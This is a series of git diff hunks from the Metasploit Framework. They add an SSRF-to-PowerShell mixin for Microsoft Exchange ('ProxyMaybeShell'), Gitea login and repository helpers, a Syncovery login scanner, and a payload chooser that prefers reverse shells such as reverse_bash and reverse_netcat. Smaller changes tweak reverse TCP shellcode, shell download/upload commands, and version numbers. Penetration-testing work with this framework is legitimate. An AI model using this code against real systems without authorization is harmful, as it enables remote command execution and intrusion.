+          login_uri = normalize_uri("#{uri}/")
+          res = send_request({ 'uri' => login_uri })
+
+          if res && res.code == 200 && res.body.include?('Syncovery')
+            return true
+          end
+
+          false
+        end
+
+        # Gets the Syncovery version.
+        #
+        # @return [String] version if version was found, otherwise FalseClass
+        def get_version
+          globals = normalize_uri("#{uri}/get_global_variables")
+          res = send_request({ 'uri' => globals })
+          if res && res.code == 200
+            json_res = res.get_json_document
+            version = json_res['SyncoveryTitle']&.scan(/Syncovery\s([A-Za-z0-9.]+)/)&.flatten&.first || ''
+            return version
+          end
+
+          false
+        end
+
+        # Actually doing the login. Called by #attempt_login
+        #
+        # @param username [String] The username to try
+        # @param password [String] The password or token to try
+        # @return [Hash]
+        #   * :status [Metasploit::Model::Login::Status]
+        #   * :proof [String] the HTTP response body or the session token
+        def get_login_state(username, password)
+          # Prep the data needed for login
+          if username.present?
+            # use username:password
+            res = send_request({
+              'uri' => normalize_uri("#{uri}/post_applogin.php"),
+              'vars_get' => {
+                'login' => username.to_s,
+                'password' => password.to_s
+              },
+              'method' => 'GET'
+            })
+            unless res
+              return { status: LOGIN_STATUS::UNABLE_TO_CONNECT }
+            end
+
+            # After login, the application should give us a new token
+            # session_token is actually just base64(MM/dd/yyyy HH:mm:ss) at the time of the login
+            json_res = res.get_json_document
+            token = json_res['session_token']
+            if token.present?
+              return { status: LOGIN_STATUS::SUCCESSFUL, proof: token.to_s }
+            end
+
+            return { proof: res.to_s }
+          else
+            # no username => token is used as password
+            res = send_request({
+              'uri' => normalize_uri("#{uri}/profiles.json"),
+              'vars_get' => {
+                'recordstartindex' => '0',
+                'recordendindex' => '0'
+              },
+              'method' => 'GET',
+              'headers' => {
+                'token' => password
+              }
+            })
+            unless res
+              return { status: LOGIN_STATUS::UNABLE_TO_CONNECT, proof: res.to_s }
+            end
+            if !res.body.to_s.include? 'Session Expired'
+              return { status: LOGIN_STATUS::SUCCESSFUL, proof: res.body.to_s }
+            end
+
+            return { proof: res.body.to_s }
+          end
+        end
+
+        # Attempts to login to Syncovery File Sync & Backup Software. This is called first.
+        #
+        # @param credential [Metasploit::Framework::Credential] The credential object
+        # @return [Result] A Result object indicating success or failure
+        def attempt_login(credential)
+          result_opts = {
+            credential: credential,
+            status: Metasploit::Model::Login::Status::INCORRECT,
+            proof: nil,
+            host: host,
+            port: port,
+            protocol: 'tcp'
+          }
+
+          begin
+            result_opts.merge!(get_login_state(credential.public, credential.private))
+          rescue ::Rex::ConnectionError => e
+            # Something went wrong during login. 'e' knows what's up.
+            result_opts.merge!(status: LOGIN_STATUS::UNABLE_TO_CONNECT, proof: e.message)
+          end
+
+          Result.new(result_opts)
+        end
+
+      end
+    end
+  end
+end
@@ -12,7 +12,23 @@ module Metasploit
          #

          # Number of allowed threads when threads are counted in `after(:suite)` or `before(:suite)`
-          EXPECTED_THREAD_COUNT_AROUND_SUITE = ENV['REMOTE_DB'] ? 4 : 3
+          #
+          # Known threads:
+          #   1. Main Ruby thread
+          #   2. Active Record connection pool thread
+          #   3. Framework thread manager, a monitor thread for removing dead threads
+          #      https://github.com/rapid7/metasploit-framework/blame/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/lib/msf/core/thread_manager.rb#L66-L89
+          #   4. Ruby's Timeout library thread, an automatically created monitor thread when using `Thread.timeout(1) { }`
+          #      https://github.com/ruby/timeout/blob/bd25f4b138b86ef076e6d9d7374b159fffe5e4e9/lib/timeout.rb#L129-L137
+          #   5. REMOTE_DB thread, if enabled
+          #
+          # Intermittent threads that are non-deterministically left behind, which should be fixed in the future:
+          #   1. metadata cache hydration
+          #      https://github.com/rapid7/metasploit-framework/blob/115946cd06faccac654e956e8ba9cf72ff328201/lib/msf/core/modules/metadata/cache.rb#L150-L153
+          #   2. session manager
+          #      https://github.com/rapid7/metasploit-framework/blob/115946cd06faccac654e956e8ba9cf72ff328201/lib/msf/core/session_manager.rb#L153-L168
+          #
+          EXPECTED_THREAD_COUNT_AROUND_SUITE = ENV['REMOTE_DB'] ? 7 : 6

          # `caller` for all Thread.new calls
          LOG_PATHNAME = Pathname.new('log/metasploit/framework/spec/threads/suite.log')
@@ -30,7 +30,7 @@ module Metasploit
        end
      end

-      VERSION = "6.2.26"
+      VERSION = "6.2.33"
      MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
      PRERELEASE = 'dev'
      HASH = get_hash
@@ -406,13 +406,13 @@ Shell Banner:
    print_line("Usage: download [src] [dst]")
    print_line
    print_line("Downloads remote files to the local machine.")
-    print_line("This command does not support to download a FOLDER yet")
+    print_line("This command does not support directories")
    print_line
  end

  def cmd_download(*args)
    if args.length != 2
-      # no argumnets, just print help message
+      # no arguments, just print help message
      return cmd_download_help
    end

@@ -421,52 +421,72 @@ Shell Banner:

    # Check if src exists
    if !_file_transfer.file_exist?(src)
-      print_error("The target file does not exist")
+      print_error('The target file does not exist')
      return
    end

+    fs_sep = platform == 'windows' ? '\\' : '/'
+    if dst.blank?
+      dst = src.split(fs_sep).last
+    elsif ::File.directory?(dst)
+      dst += ::File::SEPARATOR unless dst.end_with?(::File::SEPARATOR)
+      dst += src.split(fs_sep).last
+    end
+    dst_dir = ::File.dirname(dst)
+    ::FileUtils.mkdir_p(dst_dir) if dst_dir and not ::File.directory?(dst_dir)
+
    # Get file content
-    print_status("Download #{src} => #{dst}")
+    # match the output style of the Meterpreter equivalent
+    print_status("Downloading: #{src} -> #{dst}")
    content = _file_transfer.read_file(src)

    # Write file to local machine
-    File.binwrite(dst, content)
-    print_good("Done")
+    ::File.binwrite(dst, content)
+    print_status("Completed  : #{src} -> #{dst}")
  end

  def cmd_upload_help
    print_line("Usage: upload [src] [dst]")
    print_line
    print_line("Uploads load file to the victim machine.")
-    print_line("This command does not support to upload a FOLDER yet")
+    print_line("This command does not support directories")
    print_line
  end

  def cmd_upload(*args)
    if args.length != 2
-      # no argumnets, just print help message
+      # no arguments, just print help message
      return cmd_upload_help
    end

    src = args[0]
    dst = args[1]

+    if dst.blank?
+      dst = ::File.basename(src)
+    elsif _file_transfer.directory?(dst)
+      fs_sep = platform == 'windows' ? '\\' : '/'
+      dst += fs_sep unless dst.end_with?(fs_sep)
+      dst += ::File.basename(src)
+    end
+
    # Check target file exists on the target machine
    if _file_transfer.file_exist?(dst)
-      print_warning("The file <#{dst}> already exists on the target machine")
-      unless prompt_yesno("Overwrite the target file <#{dst}>?")
+      print_warning('The target file already exists')
+      unless prompt_yesno("Overwrite the target file #{dst}?")
        return
      end
    end

+    print_status("Uploading  : #{src} -> #{dst}")
    begin
-      content = File.binread(src)
+      # Read file from local machine
+      content = ::File.binread(src)
      _file_transfer.write_file(dst, content)
-      print_good("File <#{dst}> upload finished")
+      print_status("Completed  : #{src} -> #{dst}")
    rescue => e
-      print_error("Error occurs while uploading <#{src}> to <#{dst}> - #{e.message}")
+      print_error("Failed     : #{src} -> #{dst} - #{e.message}")
      elog(e)
-      return
    end
  end

@@ -30,6 +30,7 @@ module Auxiliary::Report
      framework.db.create_cracked_credential(opts)
    elsif !db_warning_given?
      vprint_warning('No active DB -- Credential data will not be saved!')
+      nil
    end
  end

@@ -39,6 +40,7 @@ module Auxiliary::Report
      framework.db.create_credential(opts)
    elsif !db_warning_given?
      vprint_warning('No active DB -- Credential data will not be saved!')
+      nil
    end
  end

@@ -48,6 +50,7 @@ module Auxiliary::Report
      framework.db.create_credential_login(opts)
    elsif !db_warning_given?
      vprint_warning('No active DB -- Credential data will not be saved!')
+      nil
    end
  end

@@ -57,6 +60,7 @@ module Auxiliary::Report
      framework.db.create_credential_and_login(opts)
    elsif !db_warning_given?
      vprint_warning('No active DB -- Credential data will not be saved!')
+      nil
    end
  end

@@ -66,6 +70,7 @@ module Auxiliary::Report
      framework.db.invalidate_login(opts)
    elsif !db_warning_given?
      vprint_warning('No active DB -- Credential data will not be saved!')
+      nil
    end
  end

@@ -0,0 +1,207 @@
+# -*- coding: binary -*-
+
+require 'winrm'
+
+module Msf::Exploit::Remote::HTTP::Exchange::ProxyMaybeShell
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super
+
+    register_advanced_options(
+      [
+        Msf::OptFloat.new('MaxBackendRetries', [true, 'The maximum number of times to retry for targeting the backend', 10]),
+      ], self.class
+    )
+  end
+
+  def execute_powershell(cmdlet, args: [], cat: nil)
+    winrm = SSRFWinRMConnection.new({
+      endpoint: full_uri('PowerShell/'),
+      transport: :ssrf,
+      max_backend_retries: datastore['MaxBackendRetries'].to_i,
+      ssrf_proc: proc do |method, uri, opts|
+        uri = "#{uri}?X-Rps-CAT=#{cat}" if cat
+        opts[:data].gsub!(
+          %r{<#{WinRM::WSMV::SOAP::NS_ADDRESSING}:To>(.*?)</#{WinRM::WSMV::SOAP::NS_ADDRESSING}:To>},
+          "<#{WinRM::WSMV::SOAP::NS_ADDRESSING}:To>http://127.0.0.1/PowerShell/</#{WinRM::WSMV::SOAP::NS_ADDRESSING}:To>"
+        )
+        opts[:data].gsub!(
+          %r{<#{WinRM::WSMV::SOAP::NS_WSMAN_DMTF}:ResourceURI mustUnderstand="true">(.*?)</#{WinRM::WSMV::SOAP::NS_WSMAN_DMTF}:ResourceURI>},
+          "<#{WinRM::WSMV::SOAP::NS_WSMAN_DMTF}:ResourceURI>http://schemas.microsoft.com/powershell/Microsoft.Exchange</#{WinRM::WSMV::SOAP::NS_WSMAN_DMTF}:ResourceURI>"
+        )
+        res = send_http(method, uri, opts)
+        raise WinRM::WinRMAuthorizationError.new('Server responded with 401 Unauthorized.') if res&.code == 401
+
+        res
+      end
+    })
+
+    successful = true
+    begin
+      winrm.shell(:powershell) do |shell|
+        shell.instance_variable_set(:@max_fragment_blob_size, WinRM::PSRP::MessageFragmenter::DEFAULT_BLOB_LENGTH)
+        shell.extend(SSRFWinRMConnection::PowerShell)
+        shell.run({ cmdlet: cmdlet, args: args }) do |stdout, stderr|
+          unless stdout.blank?
+            vprint_line('PSRP output received:')
+            vprint_line(stdout)
+          end
+          unless stderr.blank?
+            successful = false
+            vprint_error('PSRP error received:')
+            vprint_line(stderr)
+          end
+        end
+      end
+    rescue WinRM::WinRMAuthorizationError => e
+      fail_with(Msf::Exploit::Failure::NoAccess, e.message)
+    rescue WinRM::WinRMError => e
+      vprint_error("Exception: #{e.message}")
+      successful = false
+    rescue Msf::Exploit::Failed => e
+      raise e
+    rescue RuntimeError => e
+      print_error("Exception: #{e.inspect}")
+      successful = false
+    end
+
+    successful
+  end
+
+  def send_http(method, uri, opts = {})
+    request = {
+      'method' => method,
+      'uri' => uri,
+      'agent' => datastore['UserAgent'],
+      'ctype' => opts[:ctype],
+      'cookie' => opts[:cookie],
+      'headers' => { 'Accept' => '*/*', 'Cache-Control' => 'no-cache', 'Connection' => 'keep-alive' }
+    }
+    request = request.merge({ 'data' => opts[:data] }) unless opts[:data].nil?
+    request = request.merge({ 'headers' => opts[:headers] }) unless opts[:headers].nil?
+    request = request.merge(opts[:authentication]) unless opts[:authentication].nil?
+
+    begin
+      received = send_request_cgi(request)
+    rescue Errno::ECONNRESET => e
+      fail_with(Msf::Exploit::Failure::Disconnected, 'Server reset the connection.')
+    end
+
+    fail_with(Msf::Exploit::Failure::TimeoutExpired, 'Server did not respond in an expected way.') unless received
+
+    received
+  end
+
+  class XMLTemplate
+    def self.render(template_name, context = nil)
+      file_path = ::File.join(::Msf::Config.data_directory, 'exploits', 'proxymaybeshell', "#{template_name}.xml.erb")
+      template = ::File.binread(file_path)
+      case context
+      when Hash
+        b = binding
+        locals = context.collect { |k, _| "#{k} = context[#{k.inspect}]; " }
+        b.eval(locals.join)
+      when NilClass
+        b = binding
+      else
+        raise ArgumentError
+      end
+      b.eval(Erubi::Engine.new(template).src)
+    end
+  end
+
+  class SSRFWinRMConnection < WinRM::Connection
+    class MessageFactory < WinRM::PSRP::MessageFactory
+      def self.create_pipeline_message(runspace_pool_id, pipeline_id, command)
+        WinRM::PSRP::Message.new(
+          runspace_pool_id,
+          WinRM::PSRP::Message::MESSAGE_TYPES[:create_pipeline],
+          XMLTemplate.render('create_pipeline', cmdlet: command[:cmdlet], args: command[:args]),
+          pipeline_id
+        )
+      end
+    end
+
+    # we have to define this class so we can define our own transport factory that provides one backed by the SSRF
+    # vulnerability
+    class TransportFactory < WinRM::HTTP::TransportFactory
+      class HttpSsrf < WinRM::HTTP::HttpTransport
+        # rubocop:disable Lint/
+        def initialize(endpoint, options)
+          @endpoint = endpoint.is_a?(String) ? URI.parse(endpoint) : endpoint
+          @ssrf_proc = options[:ssrf_proc]
+          # this tracks the backend target, the PSRP session needs to communicate with one target
+          # this would be the case if Exchange Data Access Group (DAG) is in use
+          @backend = nil
+          @max_backend_attempts = [options.fetch(:max_backend_retries, 10) + 1, 1].max
+        end
+
+        def send_request(message)
+          resp = nil
+          @max_backend_attempts.times do
+            resp = @ssrf_proc.call('POST', @endpoint.path, { ctype: 'application/soap+xml;charset=UTF-8', data: message })
+
+            if resp.code == 500 && resp.headers['X-CalculatedBETarget'] != @backend
+              # retry the request if it failed and the backend was different than the target
+              next
+            end
+
+            break
+          end
+
+          if resp&.code == 200 && @backend.nil?
+            @backend = resp.headers['X-CalculatedBETarget']
+          end
+
+          WinRM::ResponseHandler.new(resp.body, resp.code).parse_to_xml
+        end
+
+        attr_reader :backend
+      end
+
+      def create_transport(connection_opts)
+        raise NotImplementedError unless connection_opts[:transport] == :ssrf
+
+        super
+      end
+
+      private
+
+      def init_ssrf_transport(opts)
+        HttpSsrf.new(opts[:endpoint], opts)
+      end
+    end
+
+    module PowerShell
+      def send_command(command, _arguments)
+        command_id = SecureRandom.uuid.to_s.upcase
+        message = MessageFactory.create_pipeline_message(@runspace_id, command_id, command)
+        fragmenter.fragment(message) do |fragment|
+          command_args = [connection_opts, shell_id, command_id, fragment]
+          if fragment.start_fragment
+            resp_doc = transport.send_request(WinRM::WSMV::CreatePipeline.new(*command_args).build)
+            command_id = REXML::XPath.first(resp_doc, "//*[local-name() = 'CommandId']").text
+          else
+            transport.send_request(WinRM::WSMV::SendData.new(*command_args).build)
+          end
+        end
+
+        command_id
+      end
+    end
+
+    def initialize(connection_opts)
+      # these have to be set to truthy values to pass the option validation, but they're not actually used because hax
+      connection_opts.merge!({ user: :ssrf, password: :ssrf })
+      super(connection_opts)
+    end
+
+    def transport
+      @transport ||= begin
+        transport_factory = TransportFactory.new
+        transport_factory.create_transport(@connection_opts)
+      end
+    end
+  end
+end
@@ -0,0 +1,37 @@
+# -*- coding: binary -*-
+
+module Msf
+  class Exploit
+    class Remote
+      module HTTP
+        # This module provides a way of interacting with gitea installations
+        module Gitea
+          include Msf::Exploit::Remote::HttpClient
+          include Msf::Exploit::Remote::HTTP::Gitea::Base
+          include Msf::Exploit::Remote::HTTP::Gitea::Version
+          include Msf::Exploit::Remote::HTTP::Gitea::Helpers
+          include Msf::Exploit::Remote::HTTP::Gitea::Login
+          include Msf::Exploit::Remote::HTTP::Gitea::Error
+          include Msf::Exploit::Remote::HTTP::Gitea::URIs
+          include Msf::Exploit::Remote::HTTP::Gitea::Repository
+
+          def initialize(info = {})
+            super
+
+            register_options(
+              [
+                Msf::OptString.new('TARGETURI', [true, 'The base path to the gitea application', '/'])
+              ], Msf::Exploit::Remote::HTTP::Gitea
+            )
+
+            register_advanced_options(
+              [
+                Msf::OptBool.new('GITEACHECK', [true, 'Check if the website is a valid Gitea install', true]),
+              ], Msf::Exploit::Remote::HTTP::Gitea
+            )
+          end
+        end
+      end
+    end
+  end
+end
@@ -0,0 +1,36 @@
+# -*- coding: binary -*-
+
+module Msf::Exploit::Remote::HTTP::Gitea::Base
+  # Checks if the site is online and running gitea
+  #
+  # @return [String,nil] if the site is online and running gitea, nil or raise
+  #   UnknownError, VersionError and ::Rex exceptions otherwise
+  def get_gitea_version
+    unless datastore['GITEACHECK']
+      vprint_status 'Skipping Gitea check...'
+      return true
+    end
+
+    gitea_detect_regexes = [
+      /i_like_gitea=\w+/,
+    ]
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path)
+    })
+
+    raise Msf::Exploit::Remote::HTTP::Gitea::Error::UnknownError.new('Check TARGETURI - Unexpected HTTP response code') if res&.code != 200
+
+    if gitea_detect_regexes.none? { |r| res.get_cookies =~ r }
+      raise Msf::Exploit::Remote::HTTP::Gitea::Error::UnknownError.new('No web server or gitea instance found')
+    end
+
+    version = gitea_version(res)
+    raise Msf::Exploit::Remote::HTTP::Gitea::Error::VersionError.new unless version
+    version
+
+  rescue ::Rex::ConnectionError, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+    raise Msf::Exploit::Remote::HTTP::Gitea::Error::UnknownError.new('Could not connect to the web service')
+  end
+end
@@ -0,0 +1,45 @@
+# -*- coding: binary -*-
+
+module Msf::Exploit::Remote::HTTP::Gitea::Error
+  class WebError < ::StandardError
+    def initialize(message: nil)
+      super(message || 'Gitea WebError')
+    end
+  end
+
+  class CsrfError < WebError
+    def initialize
+      super(message: 'Unable to get CSRF token')
+    end
+  end
+
+  class AuthenticationError < WebError
+    def initialize
+      super(message: 'Authentication failed')
+    end
+  end
+
+  class MigrationError < WebError
+    def initialize(message)
+      super(message: message)
+    end
+  end
+
+  class RepositoryError < WebError
+    def initialize(message)
+      super(message: message)
+    end
+  end
+
+  class UnknownError < WebError
+    def initialize(message)
+      super(message: message)
+    end
+  end
+
+  class VersionError < WebError
+    def initialize
+      super(message: 'Unable to determine Gitea version')
+    end
+  end
+end
@@ -0,0 +1,97 @@
+# -*- coding: binary -*-
+
+module Msf::Exploit::Remote::HTTP::Gitea::Helpers
+  # Helper methods are private and should not be called by modules
+
+  module_function
+
+  # Returns CSRF token string for Gitea session
+  #
+  # @param res [Rex::Proto::Http::Response] Rex HTTP Response object
+  # @return [String,nil] csrf token if found, nil otherwise
+  def gitea_get_csrf(res)
+    res&.get_html_document&.at('//input[@name="_csrf"]/@value')&.text
+  end
+
+  # Returns string for Gitea repository uid
+  #
+  # @param res [Rex::Proto::Http::Response] Rex HTTP Response object
+  # @return [String,nil] repo uid string if found, nil otherwise
+  def gitea_get_repo_uid(res)
+    res&.get_html_document&.at('//input[@id="uid"]/@value')&.text
+  end
+
+  # Returns string for Gitea service type uri
+  #
+  # @param res [Rex::Proto::Http::Response] Rex HTTP Response object
+  # @return [String,nil] Gitea service type uri string if found, nil otherwise
+  def gitea_get_service_type_uri(res)
+    res&.get_html_document&.at('//svg[@class="svg gitea-gitea"]/ancestor::a/@href')&.text
+  end
+
+  # Returns the POST data for a Gitea login request
+  #
+  # @param user [String] Username
+  # @param pass [String] Password
+  # @param csrf [String] Login csrf
+  # @return [Hash] The post data for vars_post Parameter
+  def gitea_helper_login_post_data(user, pass, csrf)
+    {
+      'user_name' => user,
+      'password' => pass,
+      '_csrf' => csrf
+    }
+  end
+
+  # Returns the POST data for a Gitea create repository request
+  #
+  # @param name [String] Repository name
+  # @param uid [String] Repository uid
+  # @param csrf [String] Login csrf
+  # @return [Hash] The post data for vars_post Parameter
+  def gitea_helper_repo_create_post_data(name, uid, csrf)
+    {
+      'uid' => uid,
+      'auto_init' => 'on',
+      'readme' => 'Default',
+      'repo_name' => name,
+      'trust_model' => 'default',
+      'default_branch' => 'master',
+      '_csrf' => csrf
+    }
+  end
+
+  # Returns the POST data for a Gitea remove repository request
+  #
+  # @param name [String] Repository path
+  # @param csrf [String] Login csrf
+  # @return [Hash] The post data for vars_post Parameter
+  def gitea_helper_repo_remove_post_data(name, csrf)
+    {
+      'action' => 'delete',
+      'repo_name' => name,
+      '_csrf' => csrf
+    }
+  end
+
+  # Returns the POST data for a Gitea migrate repository request
+  #
+  # @param name [String] Repository name
+  # @param uid [String] Repository uid
+  # @param service [String] Service id
+  # @param url [String] Repository name
+  # @param token [String] Repository auth token
+  # @param csrf [String] Login csrf
+  # @return [Hash] The post data for vars_post Parameter
+  def gitea_helper_repo_migrate_post_data(name, uid, service, url, token, csrf)
+    {
+      'uid' => uid,
+      'service' => service,
+      'pull_requests' => 'on',
+      'repo_name' => name,
+      '_csrf' => csrf,
+      'auth_token' => token,
+      'clone_addr' => url
+    }
+  end
+end
@@ -0,0 +1,36 @@
+# -*- coding: binary -*-
+
+module Msf::Exploit::Remote::HTTP::Gitea::Login
+  # performs a gitea login
+  #
+  # @param user [String] Username
+  # @param pass [String] Password
+  # @param timeout [Integer] The maximum number of seconds to wait before the
+  #   request times out
+  # @raise [CsrfError] if the CSRF could not be retrieved
+  # @raise [AuthenticationError] if the authentication fails
+  # @return [Rex::Proto::Http::Response,AuthenticationError] the HTTP response
+  #   on successful login, raise AuthenticationError otherwise
+  def gitea_login(user, pass, timeout = 20)
+    res = send_request_cgi({
+      'uri' => gitea_url_login,
+      'keep_cookies' => true
+    }, timeout)
+    return nil unless res
+
+    csrf = gitea_get_csrf(res)
+    raise Msf::Exploit::Remote::HTTP::Gitea::Error::CsrfError.new unless csrf
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => gitea_url_login,
+      'vars_post' => gitea_helper_login_post_data(user, pass, csrf),
+      'keep_cookies' => true
+    )
+
+    raise Msf::Exploit::Remote::HTTP::Gitea::Error::AuthenticationError.new if res&.code != 302
+
+    store_valid_credential(user: user, private: pass)
+    return res
+  end
+end
@@ -0,0 +1,100 @@
+# -*- coding: binary -*-
+
+module Msf::Exploit::Remote::HTTP::Gitea::Repository
+  # performs a gitea repository creation
+  #
+  # @param name [String] Repository name
+  # @param timeout [Integer] The maximum number of seconds to wait before the
+  #   request times out
+  # @return [uid,nil] the repository uid as a single string on successful
+  #   creation, nil or raise RepositoryError and CsrfError otherwise
+  def gitea_create_repo(name, timeout = 20)
+    res = send_request_cgi({
+      'uri' => gitea_url_repo_create,
+      'keep_cookies' => true
+    }, timeout)
+    return nil unless res
+
+    uid = gitea_get_repo_uid(res)
+    raise Msf::Exploit::Remote::HTTP::Gitea::Error::RepositoryError.new('Unable to get repo uid') unless uid
+
+    csrf = gitea_get_csrf(res)
+    raise Msf::Exploit::Remote::HTTP::Gitea::Error::CsrfError.new unless csrf
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => gitea_url_repo_create,
+      'vars_post' => gitea_helper_repo_create_post_data(name, uid, csrf),
+      'keep_cookies' => true
+    )
+    raise Msf::Exploit::Remote::HTTP::Gitea::Error::RepositoryError.new('Unable to create repo') if res&.code != 302
+    return uid
+  end
+
+  # performs a gitea repository migration
+  #
+  # @param name [String] Repository name
+  # @param name [String] Repository uid
+  # @param timeout [Integer] The maximum number of seconds to wait before the
+  #   request times out
+  # @return [Rex::Proto::Http::Response, MigrationError] the HTTP response
+  #   object on successful migration, raise MigrationError otherwise
+  def gitea_migrate_repo(name, uid, url, token, timeout = 20)
+    res = send_request_cgi({
+      'uri' => gitea_url_repo_migrate,
+      'keep_cookies' => true
+    }, timeout)
+    return nil unless res
+
+    uri = gitea_get_service_type_uri(res)
+    raise Msf::Exploit::Remote::HTTP::Gitea::Error::WebError.new('Unable to get service type uri') unless uri
+
+    service = Rack::Utils.parse_query(URI.parse(uri).query)['service_type']
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, uri),
+      'keep_cookies' => true
+    )
+    csrf = gitea_get_csrf(res)
+    raise Msf::Exploit::Remote::HTTP::Gitea::Error::CsrfError.new unless csrf
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => uri,
+      'vars_post' => gitea_helper_repo_migrate_post_data(name, uid, service, url, token, csrf),
+      'keep_cookies' => true
+    )
+    if res&.code != 302 # possibly triggered by the [migrations] settings
+      err = res&.get_html_document&.at('//div[contains(@class, flash-error)]/p')&.text
+      raise Msf::Exploit::Remote::HTTP::Gitea::Error::MigrationError.new(err)
+    end
+    return res
+  end
+
+  # performs a gitea repository deletion
+  #
+  # @param path [String] Repository path (/username/reponame)
+  # @param timeout [Integer] The maximum number of seconds to wait before the
+  #   request times out
+  # @return [Rex::Proto::Http::Response] the HTTP response object or raise
+  #   CsrfError otherwise
+  def gitea_remove_repo(path, timeout = 20)
+    uri = gitea_url_repo_settings(path)
+    res = send_request_cgi({
+      'uri' => uri,
+      'keep_cookies' => true
+    }, timeout)
+    return nil unless res
+    return res if res&.code == 404 # return res if 404 to handling cleanup
+
+    csrf = gitea_get_csrf(res)
+    raise Msf::Exploit::Remote::HTTP::Gitea::Error::CsrfError.new unless csrf
+
+    name = path.split('/').last
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => uri,
+      'vars_post' => gitea_helper_repo_remove_post_data(name, csrf),
+      'keep_cookies' => true
+    )
+  end
+end
@@ -0,0 +1,31 @@
+# -*- coding: binary -*-
+
+module Msf::Exploit::Remote::HTTP::Gitea::URIs
+  # Returns the Gitea Login URL
+  #
+  # @return [String] Gitea Login URL
+  def gitea_url_login
+    normalize_uri(target_uri.path, 'user', 'login')
+  end
+
+  # Returns the Gitea Create repository URL
+  #
+  # @return [String] Gitea Create repository URL
+  def gitea_url_repo_create
+    normalize_uri(target_uri.path, 'repo', 'create')
+  end
+
+  # Returns the Gitea Migrate repository URL
+  #
+  # @return [String] Gitea Migrate repository URL
+  def gitea_url_repo_migrate
+    normalize_uri(target_uri.path, 'repo', 'migrate')
+  end
+
+  # Returns the Gitea Settings repository URL
+  #
+  # @return [String] Gitea Settings repository URL
+  def gitea_url_repo_settings(path)
+    normalize_uri(target_uri.path, path, 'settings')
+  end
+end
@@ -0,0 +1,34 @@
+# -*- coding: binary -*-
+
+module Msf::Exploit::Remote::HTTP::Gitea::Version
+  # Powered by Gitea Version
+  GITEA_VERSION_PATTERN = 'Gitea Version: (?<version>[\da-zA-Z.]+)'.freeze
+
+  # Extracts the Gitea version information from base path
+  #
+  # @param res [Rex::Proto::Http::Response] Rex HTTP Response object
+  # @return [String,nil] gitea version if found, nil otherwise
+  def gitea_version(res = nil)
+    # detect version from /
+    version = gitea_version_helper(
+      normalize_uri(target_uri.path),
+      /#{GITEA_VERSION_PATTERN}/,
+      res
+    )
+    return version
+  end
+
+  def gitea_version_helper(url, regex, res)
+    res ||= send_request_cgi({
+      'method' => 'GET',
+      'uri' => url,
+      'keep_cookies' => true
+    })
+    if res
+      match = res.body.match(regex)
+      return match[1] if match
+    end
+
+    nil
+  end
+end
@@ -69,7 +69,7 @@ module Msf::Exploit::Remote::HTTP::NagiosXi::Install
  #
  # @param cookies [String] cookies required to visit the license agreement page
  # @param nsp [String] nsp token required to visit the license agreement page
-  # @return [nil, Array] nil if signing the the license agreement succeeds, otherwise Array containing an error code and an error message
+  # @return [nil, Array] nil if signing the license agreement succeeds, otherwise Array containing an error code and an error message
  def sign_license_agreement(cookies, nsp)
    if cookies.blank?
      return [2, 'Cannot sign the license agreement. The provided cookies are empty or nil.']
@@ -463,6 +463,66 @@ class Payload < Msf::Module
    return nops
  end

+  # Select a reasonable default payload and minimally configure it
+  # @param [Msf::Module] mod
+  def self.choose_payload(mod)
+    compatible_payloads = mod.compatible_payloads(
+      excluded_platforms: ['Multi'] # We don't want to select a multi payload
+    ).map(&:first)
+
+    # XXX: Determine LHOST based on global LHOST, RHOST or an arbitrary internet address
+    lhost = mod.datastore['LHOST'] || Rex::Socket.source_address(mod.datastore['RHOST'] || '50.50.50.50')
+
+    configure_payload = lambda do |payload|
+      if mod.datastore.is_a?(Msf::DataStoreWithFallbacks)
+        payload_defaults = { 'PAYLOAD' => payload }
+
+        # Set LHOST if this is a reverse payload
+        if payload.index('reverse')
+          payload_defaults['LHOST'] = lhost
+        end
+        mod.datastore.import_defaults_from_hash(payload_defaults, imported_by: 'choose_payload')
+      else
+        mod.datastore['PAYLOAD'] = payload
+        # Set LHOST if this is a reverse payload
+        if payload.index('reverse')
+          mod.datastore['LHOST'] = lhost
+        end
+      end
+
+      payload
+    end
+
+    # If there is only one compatible payload, return it immediately
+    if compatible_payloads.length == 1
+      return configure_payload.call(compatible_payloads.first)
+    end
+
+    # XXX: This approach is subpar, and payloads should really be ranked!
+    preferred_payloads = [
+      # These payloads are generally reliable and common enough in practice
+      '/meterpreter/reverse_tcp',
+      '/shell/reverse_tcp',
+      'cmd/unix/reverse_bash',
+      'cmd/unix/reverse_netcat',
+      'cmd/windows/powershell_reverse_tcp',
+      # Fall back on a generic payload to autoselect a specific payload
+      'generic/shell_reverse_tcp',
+      'generic/shell_bind_tcp'
+    ]
+
+    # XXX: This is not efficient in the slightest
+    preferred_payloads.each do |type|
+      payload = compatible_payloads.find { |name| name.end_with?(type) }
+
+      next unless payload
+
+      return configure_payload.call(payload)
+    end
+
+    nil
+  end
+
  #
  # A placeholder stub, to be overriden by mixins
  #
@@ -95,7 +95,7 @@ module Payload::Linux::ReverseTcp_x64

    asm = %Q^
      mmap:
-        xor    rdi, rdi
+        xor    edi, edi
        push   0x9
        pop    rax
        cdq
@@ -104,8 +104,9 @@ module Payload::Linux::ReverseTcp_x64
        xor    r9, r9
        push   0x22
        pop    r10
-        mov    dl, 0x7
-        syscall ; mmap(NULL, 4096, PROT_READ|PROT_WRITE|PROT_EXEC|0x1000, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0)
+        push   0x7
+        pop    rdx
+        syscall ; mmap(NULL, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0)
        test   rax, rax
        js failed

@@ -63,7 +63,7 @@ module Payload::Python::ReverseHttp
    uri_req_len = 30 + luri.length + rand(256 - (30 + luri.length))

    # Generate the short default URL if we don't have enough space
-    if self.available_space.nil? || required_space > self.available_space
+    if self.available_space.nil? || dynamic_size? || required_space > self.available_space
      uri_req_len = 30
    end

@@ -0,0 +1,376 @@
+# Encoding: ASCII-8BIT
+
+module Msf
